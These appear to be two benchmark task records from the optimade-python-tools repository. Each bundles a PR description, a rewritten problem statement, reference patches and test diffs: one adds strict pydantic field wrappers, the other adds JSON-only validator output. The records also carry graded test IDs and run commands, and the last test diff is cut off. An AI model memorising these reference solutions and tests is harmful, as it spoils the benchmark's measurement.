for a semantic version, using the recommended semver regexp from
SHOULD/MUST/OPTIONAL fields in models Following the discussion in #399, this PR is a place to try out ways of incorporating the "SHOULD" level of support for some fields in the specification. This PR does the following: - adds a couple of wrappers around pydantic's `Field` (namely `OptimadeField` and `StrictField`). - `StrictField` disallows keys outside of the pydantic `Field` signature, plus a couple of extras that we use (`unit`, `pattern` and `uniqueItems`), unfortunately. It emits a warning if a description is not supplied. Any tips on how to do this in a more pydantic way would be appreciated... - `OptimadeField` calls `StrictField` but also forces all fields to supply a `queryable` and a `support` attribute for all fields - ~switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation.~ - fix a couple of fields that @CasperWA spotted elsewhere that have a typo `decsription` that means the schema never saw their descriptions... this is basically what `StrictField` will prevent in the future.
**Title** Enforce strict field definitions and add OPTIMADE support metadata across models **Problem** Model definitions used generic pydantic fields, allowing unintended keyword arguments, missing descriptions, and typographical errors that broke schema generation. The OPTIMADE specification’s “SHOULD/MUST/OPTIONAL” support levels were not represented, and the OpenAPI documentation lacked key descriptions for person objects. **Root Cause** Absence of a controlled wrapper for field creation caused lax validation and omission of required metadata, while the OpenAPI JSON omitted essential property descriptions. **Fix / Expected Behavior** - Introduce a strict field wrapper that validates allowed arguments and warns on missing descriptions. - Add an OPTIMADE‑specific field wrapper that records support and queryability levels for each property. - Replace all generic field definitions with the new wrappers, assigning appropriate support levels (MUST, SHOULD, OPTIONAL) and queryability flags. - Update the OpenAPI schema to include missing descriptions for person name and the person object itself. - Ensure all models now expose consistent metadata reflecting the OPTIMADE spec. **Risk & Validation** - Verify that model validation still succeeds and that existing endpoints return correctly typed responses. - Run the full test suite to catch regressions in serialization, validation, and OpenAPI generation. - Manually inspect the generated OpenAPI document to confirm the added descriptions and field metadata appear as intended.
453
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py new file mode 100644 index 00000000..279d4d68 --- /dev/null +++ b/tests/models/test_utils.py @@ -0,0 +1,76 @@ +import pytest +from pydantic import BaseModel +from optimade.models.utils import OptimadeField, StrictField, SupportLevel +from typing import List, Callable + + +def make_bad_models(field: Callable): + """Check that models using `field` to replace `Field` provide + appropriate warnings and errors. + + """ + with pytest.raises(RuntimeError, match="with forbidden keywords"): + + class BadModel(BaseModel): + bad_field: int = field(..., random_key="disallowed") + + with pytest.warns(UserWarning, match="No description"): + + class AnotherBadModel(BaseModel): + bad_field: int = field(...) + + +def test_strict_field(): + """Test `StrictField` creation for failure on bad keys, and + warnings with no description. + + """ + make_bad_models(StrictField) + + +def test_optimade_field(): + """Test `OptimadeField` creation for failure on bad keys, and + warnings with no description. + + """ + make_bad_models(OptimadeField) + + +def test_compatible_strict_optimade_field(): + """This test checks that OptimadeField and StrictField + produce the same schemas when given the same arguments. + + """ + + class CorrectModelWithStrictField(BaseModel): + # check that unit and uniqueItems are passed through + good_field: List[str] = StrictField( + ..., + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, + description="Unit test to make sure that StrictField allows through OptimadeField keys", + pattern="^structures$", + unit="stringiness", + uniqueItems=True, + sortable=True, + ) + + class CorrectModelWithOptimadeField(BaseModel): + + good_field: List[str] = OptimadeField( + ..., + # Only difference here is that OptimadeField allows case-insensitive + # strings to be passed instead of support levels directly + support="must", + queryable="optional", + description="Unit test to make sure that StrictField allows through OptimadeField keys", + pattern="^structures$", + uniqueItems=True, + unit="stringiness", + sortable=True, + ) + + optimade_schema = CorrectModelWithOptimadeField.schema() + strict_schema = CorrectModelWithStrictField.schema() + strict_schema["title"] = optimade_schema["title"] + assert strict_schema == optimade_schema
[ "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field" ]
[]
Function: StrictField(*args, description: str = None, **kwargs) → Field Location: optimade.models.utils.StrictField Inputs: - *args: positional arguments forwarded to ``pydantic.Field`` (e.g., default value or Ellipsis). - description (optional str): description for the field; if omitted a ``UserWarning`` is emitted. - **kwargs: keyword arguments that must belong to the signature of ``pydantic.Field`` **or** the allowed extra keys ``unit``, ``pattern``, ``uniqueItems``, ``support``, ``queryable``, ``sortable``. Any other key triggers a ``RuntimeError``. Outputs: a ``pydantic.Field`` instance with the supplied arguments and the description (if given) attached. Description: A thin wrapper around ``pydantic.Field`` that validates that only permitted extra schema keywords are used, warns when a description is missing, and raises an error for any disallowed keyword. Function: OptimadeField(*args, support: SupportLevel | str = None, queryable: SupportLevel | str = None, unit: str = None, **kwargs) → Field Location: optimade.models.utils.OptimadeField Inputs: - *args: positional arguments forwarded to ``pydantic.Field`` (as in ``StrictField``). - support (optional): ``SupportLevel`` enum member or string (``"must"``, ``"should"``, ``"optional"``) indicating the field’s required support level. - queryable (optional): ``SupportLevel`` enum member or string indicating the queryability support level. - unit (optional str): textual description of the physical unit of the field. - **kwargs: any other keyword arguments accepted by ``pydantic.Field`` (validated by ``StrictField``). Outputs: a ``pydantic.Field`` instance created via ``StrictField`` with the additional ``support``, ``queryable`` and ``unit`` metadata attached when provided. Description: Extends ``StrictField`` by adding OPTIMADE‑specific metadata (support level, queryability, and unit) while preserving the same validation of allowed keywords. Enum: SupportLevel Location: optimade.models.utils.SupportLevel Inputs: No arguments (enum definition). Members: - MUST = "must" - SHOULD = "should" - OPTIONAL = "optional" Outputs: Enum members representing the three OPTIMADE support levels. Description: Enumeration used throughout the models to declare whether a field is required (MUST), recommended (SHOULD), or optional (OPTIONAL) in the specification; the test suite accesses the ``MUST`` and ``OPTIONAL`` members.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_utils.py" }
{ "num_modified_files": 11, "num_modified_lines": 519, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue clearly specifies adding OptimadeField and StrictField wrappers, enforcing support levels, emitting warnings on missing descriptions, and rejecting unknown keywords, with a test suite that checks these behaviors and schema equivalence. The tests directly exercise the described functionality without external dependencies or unrelated expectations. No signals of B‑category problems are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e05e0b806e5918ab30b0e8bcbc26b66d3927e306
2020-09-15 22:41:33
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=h1) Report > Merging [#502](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e05e0b806e5918ab30b0e8bcbc26b66d3927e306?el=desc) will **decrease** coverage by `0.02%`. > The diff coverage is `97.05%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #502 +/- ## ========================================== - Coverage 91.58% 91.56% -0.03% ========================================== Files 61 61 Lines 3103 3106 +3 ========================================== + Hits 2842 2844 +2 - Misses 261 262 +1 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.56% <97.05%> (-0.03%)` | :arrow_down: | | #validator | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/validator/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL19faW5pdF9fLnB5) | `9.09% <0.00%> (-0.29%)` | :arrow_down: | | [optimade/validator/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3V0aWxzLnB5) | `90.29% <100.00%> (+0.14%)` | :arrow_up: | | [optimade/validator/validator.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3ZhbGlkYXRvci5weQ==) | `82.18% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=footer). Last update [e05e0b8...d0556bd](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( CasperWA: > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? Otherwise, we should contribute to MkDocs, or rather its doc-string parser :confused: CasperWA: > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. ml-evs: > > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > > > > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused > > Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. Yeah sorry, that's what I mean every time I say mkdocs... this one seems weird, mkdocstrings is meant to support dataclasses and the error is to do with parsing the markdown `api_reference/validator/validator.md` :confused: CasperWA: > > > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > > > > > > > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > > > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused > > > > > > Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. > > Yeah sorry, that's what I mean every time I say mkdocs... this one seems weird, mkdocstrings is meant to support dataclasses and the error is to do with parsing the markdown `api_reference/validator/validator.md` confused So what it's doing (I'm guessing) is following the reference and using [`pytkdocs`](https://github.com/pawamoy/pytkdocs) to extract the docstrings, then it's converting this to XML, which is where it fails, because the generated XML file is badly made. ml-evs: > So what it's doing (I'm guessing) is following the reference (to `optimade/validator/validator.py`) and using [`pytkdocs`](https://github.com/pawamoy/pytkdocs) to extract the docstrings, then it's converting this to XML, which is where it fails, because the generated XML file is badly made. So it "works" if I remove the explicit `dataclass.field` fields, though it still returns warnings for `__eq__`, `__init__` and `__repr__`:
materials-consortia__optimade-python-tools-502
diff --git a/mkdocs.yml b/mkdocs.yml index e5d0a559..4dc0288e 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -63,6 +63,7 @@ plugins: - "!__json_encoder__$" - "!__all__$" - "!__config__$" + - "!ValidatorResults$" members: true inherited_members: false docstring_style: google diff --git a/optimade/validator/__init__.py b/optimade/validator/__init__.py index 42834b56..5ca6961f 100644 --- a/optimade/validator/__init__.py +++ b/optimade/validator/__init__.py @@ -45,6 +45,12 @@ def validate(): default=0, help="""Increase the verbosity of the output.""", ) + parser.add_argument( + "-j", + "--json", + action="store_true", + help="""Only a JSON summary of the validator results will be printed to stdout.""", + ) parser.add_argument( "-t", "--as-type", @@ -97,6 +103,7 @@ def validate(): validator = ImplementationValidator( base_url=args["base_url"], verbosity=args["verbosity"], + respond_json=args["json"], as_type=args["as_type"], index=args["index"], run_optional_tests=not args["skip_optional"], diff --git a/optimade/validator/utils.py b/optimade/validator/utils.py index 84102a68..6e890227 100644 --- a/optimade/validator/utils.py +++ b/optimade/validator/utils.py @@ -132,7 +132,6 @@ class Client: # pragma: no cover if status_code != 429: break - print("Hit rate limit, sleeping for 1 s...") time.sleep(1) else: @@ -242,19 +241,20 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): if not isinstance(result, Exception): if not multistage: if not optional: - validator.success_count += 1 + validator.results.success_count += 1 else: - validator.optional_success_count += 1 + validator.results.optional_success_count += 1 message = f"✔: {request} - {msg}" if validator.verbosity > 0: if optional: print(message) else: print_success(message) - elif optional: - print(".", end="", flush=True) - else: - print_success(".", end="", flush=True) + elif validator.verbosity == 0: + if optional: + print(".", end="", flush=True) + else: + print_success(".", end="", flush=True) else: internal_error = False request = request.replace("\n", "") @@ -267,17 +267,21 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): if isinstance(result, InternalError): internal_error = True - validator.internal_failure_count += 1 + validator.results.internal_failure_count += 1 summary = f"!: {request} - {test_fn.__name__} - failed with internal error" - validator.internal_failure_messages.append((summary, message)) + validator.results.internal_failure_messages.append( + (summary, message) + ) else: summary = f"✖: {request} - {test_fn.__name__} - failed with error" if not optional: - validator.failure_count += 1 - validator.failure_messages.append((summary, message)) + validator.results.failure_count += 1 + validator.results.failure_messages.append((summary, message)) else: - validator.optional_failure_count += 1 - validator.optional_failure_messages.append((summary, message)) + validator.results.optional_failure_count += 1 + validator.results.optional_failure_messages.append( + (summary, message) + ) if validator.verbosity > 0: if internal_error: @@ -292,7 +296,7 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): print_failure(summary) for line in message: print_warning(f"\t{line}") - else: + elif validator.verbosity == 0: if internal_error: print_notify("!", end="", flush=True) elif optional: diff --git a/optimade/validator/validator.py b/optimade/validator/validator.py index 5fd18921..ed83be13 100644 --- a/optimade/validator/validator.py +++ b/optimade/validator/validator.py @@ -11,6 +11,7 @@ import sys import logging import random import urllib.parse +import dataclasses from typing import Union, Tuple, Any, List, Dict, Optional try: @@ -37,6 +38,24 @@ from optimade.validator.config import VALIDATOR_CONFIG as CONF VERSIONS_REGEXP = r"/v[0-9]+(\.[0-9]+){,2}" +__all__ = ("ImplementationValidator",) + + +@dataclasses.dataclass +class ValidatorResults: + success_count: int = 0 + failure_count: int = 0 + internal_failure_count: int = 0 + optional_success_count: int = 0 + optional_failure_count: int = 0 + failure_messages: List[Tuple[str, str]] = dataclasses.field(default_factory=list) + internal_failure_messages: List[Tuple[str, str]] = dataclasses.field( + default_factory=list + ) + optional_failure_messages: List[Tuple[str, str]] = dataclasses.field( + default_factory=list + ) + class ImplementationValidator: """Class used to make a series of checks against a particular @@ -63,6 +82,7 @@ class ImplementationValidator: client: Any = None, base_url: str = None, verbosity: int = 0, + respond_json: bool = False, page_limit: int = 5, max_retries: int = 5, run_optional_tests: bool = True, @@ -82,6 +102,8 @@ class ImplementationValidator: base of the OPTIMADE implementation. verbosity: The verbosity of the output and logging as an integer (`0`: critical, `1`: warning, `2`: info, `3`: debug). + respond_json: If `True`, print only a JSON representation of the + results of validation to stdout. page_limit: The default page limit to apply to filters. max_retries: Argument is passed to the client for how many attempts to make for a request before failing. @@ -101,6 +123,7 @@ class ImplementationValidator: self.index = index self.run_optional_tests = run_optional_tests self.fail_fast = fail_fast + self.respond_json = respond_json if as_type is None: self.as_type_cls = None @@ -147,14 +170,7 @@ class ImplementationValidator: self._test_id_by_type = {} self._entry_info_by_type = {} - self.success_count = 0 - self.failure_count = 0 - self.internal_failure_count = 0 - self.optional_success_count = 0 - self.optional_failure_count = 0 - self.failure_messages = [] - self.internal_failure_messages = [] - self.optional_failure_messages = [] + self.results = ValidatorResults() def _setup_log(self): """ Define stdout log based on given verbosity. """ @@ -164,7 +180,12 @@ class ImplementationValidator: stdout_handler.setFormatter( logging.Formatter("%(asctime)s - %(name)s | %(levelname)8s: %(message)s") ) - self._log.addHandler(stdout_handler) + + if not self.respond_json: + self._log.addHandler(stdout_handler) + else: + self.verbosity = -1 + if self.verbosity == 0: self._log.setLevel(logging.CRITICAL) elif self.verbosity == 1: @@ -176,23 +197,27 @@ class ImplementationValidator: def print_summary(self): """ Print a summary of the results of validation. """ - if self.failure_messages: + if self.respond_json: + print(json.dumps(dataclasses.asdict(self.results), indent=2)) + return + + if self.results.failure_messages: print("\n\nFAILURES") print("========\n") - for message in self.failure_messages: + for message in self.results.failure_messages: print_failure(message[0]) for line in message[1]: print_warning("\t" + line) - if self.optional_failure_messages: + if self.results.optional_failure_messages: print("\n\nOPTIONAL TEST FAILURES") print("======================\n") - for message in self.optional_failure_messages: + for message in self.results.optional_failure_messages: print_notify(message[0]) for line in message[1]: print_warning("\t" + line) - if self.internal_failure_messages: + if self.results.internal_failure_messages: print("\n\nINTERNAL FAILURES") print("=================\n") print( @@ -201,13 +226,13 @@ class ImplementationValidator: "https://github.com/Materials-Consortia/optimade-python-tools/issues/new.\n" ) - for message in self.internal_failure_messages: + for message in self.results.internal_failure_messages: print_warning(message[0]) for line in message[1]: print_warning("\t" + line) if self.valid or (not self.valid and not self.fail_fast): - final_message = f"\n\nPassed {self.success_count} out of {self.success_count + self.failure_count + self.internal_failure_count} tests." + final_message = f"\n\nPassed {self.results.success_count} out of {self.results.success_count + self.results.failure_count + self.results.internal_failure_count} tests." if not self.valid: print_failure(final_message) else: @@ -215,8 +240,8 @@ class ImplementationValidator: if self.run_optional_tests and not self.fail_fast: print( - f"Additionally passed {self.optional_success_count} out of " - f"{self.optional_success_count + self.optional_failure_count} optional tests." + f"Additionally passed {self.results.optional_success_count} out of " + f"{self.results.optional_success_count + self.results.optional_failure_count} optional tests." ) def validate_implementation(self): @@ -238,11 +263,12 @@ class ImplementationValidator: self.as_type_cls, ) self._test_as_type() - self.valid = not bool(self.failure_count) + self.valid = not bool(self.results.failure_count) return # Test entire implementation - print(f"Testing entire implementation at {self.base_url}...") + if self.verbosity >= 0: + print(f"Testing entire implementation at {self.base_url}") info_endp = CONF.info_endpoint self._log.debug("Testing base info endpoint of %s", info_endp) @@ -297,7 +323,9 @@ class ImplementationValidator: self._log.debug("Testing %s endpoint", CONF.links_endpoint) self._test_info_or_links_endpoint(CONF.links_endpoint) - self.valid = not (self.failure_count or self.internal_failure_count) + self.valid = not ( + self.results.failure_count or self.results.internal_failure_count + ) self.print_summary() @@ -390,7 +418,7 @@ class ImplementationValidator: f"Some 'MUST' properties were missing from info/{endp}: {missing}" ) - return True, "Found all required properties in entry info for endpoint {endp}" + return True, f"Found all required properties in entry info for endpoint {endp}" @test_case def _get_archetypal_entry(self, endp: str) -> Tuple[Dict[str, Any], str]:
Enable JSON response from the validator This PR adds a `-j`/`--json` flag to the validator that lowers verbosity to "-1" and only prints a JSON representation of the results to stdout.
**Title** Add optional JSON‑only output for the validator and encapsulate validation results. **Problem** The validator always prints human‑readable summaries and mixes result counters with console output logic. There is no way to retrieve the validation outcome as pure JSON, which is needed for automated pipelines. **Root Cause** Result metrics and messages are stored as independent attributes on the validator, and the output routine does not support a mode that suppresses all non‑JSON text. **Fix / Expected Behavior** - Introduce a command‑line switch that makes the validator emit a single JSON document containing all counts and messages. - Bundle all validation statistics and messages into a dedicated result object, isolating them from logging and printing code. - When JSON mode is active, suppress all regular stdout logging and set verbosity to a neutral level. - Ensure the final summary respects the new result container, producing identical human‑readable output when the flag is not used. - Preserve existing functionality for interactive use while providing a clean machine‑readable output when requested. **Risk & Validation** - Verify that JSON output includes the full set of counts and failure details identical to the human‑readable summary. - Confirm that normal (non‑JSON) runs retain their previous output format and logging behavior. - Run the test suite and a few example validator executions with and without the flag to ensure no regression in result accuracy or exit codes.
502
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/test_server_validation.py b/tests/server/test_server_validation.py index fbe35504..1548052c 100644 --- a/tests/server/test_server_validation.py +++ b/tests/server/test_server_validation.py @@ -1,4 +1,6 @@ import os +import json +import dataclasses from traceback import print_exc import pytest @@ -14,10 +16,32 @@ def test_with_validator(both_fake_remote_clients): index=both_fake_remote_clients.app == app, verbosity=5, ) - try: - validator.validate_implementation() - except Exception: - print_exc() + + validator.validate_implementation() + assert validator.valid + + +def test_with_validator_json_response(both_fake_remote_clients, capsys): + """ Test that the validator writes compliant JSON when requested. """ + from optimade.server.main_index import app + + validator = ImplementationValidator( + client=both_fake_remote_clients, + index=both_fake_remote_clients.app == app, + respond_json=True, + ) + validator.validate_implementation() + + captured = capsys.readouterr() + json_response = json.loads(captured.out) + assert json_response["failure_count"] == 0 + assert json_response["internal_failure_count"] == 0 + assert json_response["optional_failure_count"] == 0 + assert validator.results.failure_count == 0 + assert validator.results.internal_failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert dataclasses.asdict(validator.results) == json_response + assert validator.valid diff --git a/tests/validator/test_utils.py b/tests/validator/test_utils.py index 12f0eba2..afce84f0 100644 --- a/tests/validator/test_utils.py +++ b/tests/validator/test_utils.py @@ -26,11 +26,11 @@ def test_normal_test_case(): validator = ImplementationValidator(base_url="http://example.org", verbosity=0) output = dummy_test_case(validator, ([1, 2, 3], "message"), request="test_request") - assert validator.success_count == 1 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 1 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == [1, 2, 3] assert output[1] == "message" @@ -42,11 +42,11 @@ def test_optional_test_case(): output = dummy_test_case( validator, ("string response", "message"), request="test_request", optional=True ) - assert validator.success_count == 0 - assert validator.optional_success_count == 1 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 1 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == "string response" assert output[1] == "message" @@ -57,11 +57,11 @@ def test_ignored_test_case(): # Test returns None, so should not increment success/failure output = dummy_test_case(validator, (None, "message"), request="test_request") - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "message" @@ -77,11 +77,11 @@ def test_skip_optional_test_case(): output = dummy_test_case( validator, ({"test": "dict"}, "message"), request="test_request", optional=True ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "skipping optional" @@ -89,11 +89,11 @@ def test_skip_optional_test_case(): output = dummy_test_case( validator, ({"test": "dict"}, "message"), request="test_request", optional=False ) - assert validator.success_count == 1 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 1 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == {"test": "dict"} assert output[1] == "message" @@ -110,20 +110,20 @@ def test_expected_failure_test_case(): request="test_request", raise_exception=ResponseError("Dummy error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Dummy error" assert ( - validator.failure_messages[-1][0] + validator.results.failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == ["ResponseError: Dummy error"] + assert validator.results.failure_messages[-1][1] == ["ResponseError: Dummy error"] output = dummy_test_case( validator, @@ -132,20 +132,22 @@ def test_expected_failure_test_case(): raise_exception=ResponseError("Dummy error"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Dummy error" assert ( - validator.optional_failure_messages[-1][0] + validator.results.optional_failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == ["ResponseError: Dummy error"] + assert validator.results.optional_failure_messages[-1][1] == [ + "ResponseError: Dummy error" + ] output = dummy_test_case( validator, @@ -154,11 +156,11 @@ def test_expected_failure_test_case(): raise_exception=json.JSONDecodeError("Dummy JSON error", "{}", 0), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 2 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 2 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert ( @@ -166,10 +168,10 @@ def test_expected_failure_test_case(): == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" ) assert ( - validator.optional_failure_messages[-1][0] + validator.results.optional_failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == [ + assert validator.results.optional_failure_messages[-1][1] == [ "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" ] @@ -185,19 +187,19 @@ def test_unexpected_failure_test_case(): request="test_request", raise_exception=FileNotFoundError("Unexpected error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 1 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 1 assert output[0] is None assert output[1] == "FileNotFoundError: Unexpected error" assert ( - validator.internal_failure_messages[-1][0] + validator.results.internal_failure_messages[-1][0] == "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Unexpected error" ] @@ -208,19 +210,19 @@ def test_unexpected_failure_test_case(): raise_exception=FileNotFoundError("Unexpected error"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 2 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 2 assert output[0] is None assert output[1] == "FileNotFoundError: Unexpected error" assert ( - validator.internal_failure_messages[-1][0] + validator.results.internal_failure_messages[-1][0] == "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Unexpected error" ] @@ -236,11 +238,11 @@ def test_multistage_test_case(): request="test_request", multistage=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == {"test": "dict"} assert output[1] == "message" @@ -252,19 +254,21 @@ def test_multistage_test_case(): raise_exception=ResponseError("Stage of test failed"), multistage=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert 